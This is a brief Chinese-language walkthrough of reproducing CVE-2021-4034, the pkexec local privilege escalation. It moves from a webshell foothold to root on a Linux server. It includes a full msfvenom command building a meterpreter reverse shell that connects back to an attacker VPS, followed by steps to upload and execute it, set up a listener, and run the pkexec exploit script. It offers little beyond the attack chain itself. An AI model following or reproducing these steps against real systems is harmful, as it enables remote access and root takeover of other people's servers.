■ 漏洞简述

本次研究漏洞为 CVE-2021-4034，该漏洞是由于 pkexec 无法正确处理调用参数，从而将环境变量作为命令执行，具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞，从而获得受影响主机的 root 权限。该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳，导致数组溢出

接下来我们进入该漏洞的复现过程

■漏洞复现

shell大家都会拿，拿下shell后该怎么进行提权呢

0x01:加载插件，绕过PHP限制函数，此时可以在cmd中执行命行

0x02:

可以看到是Linux内核，在本地kali使用msfvenom生成一个Linux反连shell

Ip为vps：106.xx.xx.xx

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=106.xx.xx.xx LPORT=12333 -f elf -o /root/xin.elf

0x03:将xin.elf通过蚁剑上传至服务器

0x04:连接106.xx.xx.xx的vps，然后进入msf

0x05:在蚁剑给shell添加执行权限

0x06:在msf中监听shell的端口，payload linux/x86/meterpreter/reverse_tcp

0x07:pkexec存在s权限 cve-2021-4034 上传提权脚本cve-2021-4034

0x08:进入shell,进入cve-2021-4034文件夹，执行该脚本文件， 提权成功